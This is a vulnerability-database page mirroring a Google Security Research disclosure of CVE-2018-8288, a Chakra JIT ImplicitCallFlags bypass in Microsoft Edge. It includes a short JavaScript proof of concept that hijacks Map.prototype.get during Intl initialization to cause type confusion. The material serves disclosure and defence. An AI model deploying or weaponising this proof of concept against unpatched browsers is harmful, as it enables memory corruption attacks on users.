Lucene search
K

Microsoft Edge Chakra JIT ImplicitCallFlags Check Bypass

🗓️ 17 Aug 2018 00:00:00Reported by Google Security ResearchType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Microsoft Edge Chakra JIT ImplicitCallFlags Check Bypass CVE-2018-828

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl Exploit
17 Aug 201800:00
zdt
ATTACKERKB
CVE-2018-8298
11 Jul 201800:00
attackerkb
ATTACKERKB
CVE-2018-8287
11 Jul 201800:00
attackerkb
Circl
CVE-2018-8288
17 Aug 201800:00
circl
CNVD
Microsoft Internet Explorer and Edge Scripting Engine Memory Corruption Vulnerability (CNVD-2018-15435)
11 Jul 201800:00
cnvd
Check Point Advisories
Microsoft Browser Scripting Engine Memory Corruption (CVE-2018-8288)
10 Jul 201800:00
checkpoint_advisories
CVE
CVE-2018-8288
11 Jul 201800:00
cve
Cvelist
CVE-2018-8283
11 Jul 201800:00
cvelist
Cvelist
CVE-2018-8288
11 Jul 201800:00
cvelist
Github Security Blog
ChakraCore RCE Vulnerability
13 May 202201:20
github
Rows per page
`Microsoft Edge: Chakra: JIT: ImplicitCallFlags check bypass with Intl   
  
CVE-2018-8288  
  
  
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.  
  
In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.  
  
PoC:  
function opt(arr, obj) {  
arr[0] = 1.1;  
obj.x;  
arr[0] = 2.3023e-320;  
}  
  
let arr = [1.1];  
for (let i = 0; i < 0x10000; i++) {  
opt(arr, {});  
}  
  
let get = Map.prototype.get;  
Map.prototype.get = function (key) {  
Map.prototype.get = get;  
  
arr[0] = {};  
  
return this.get(key);  
};  
  
opt(arr, Intl);  
  
alert(arr[0]);  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation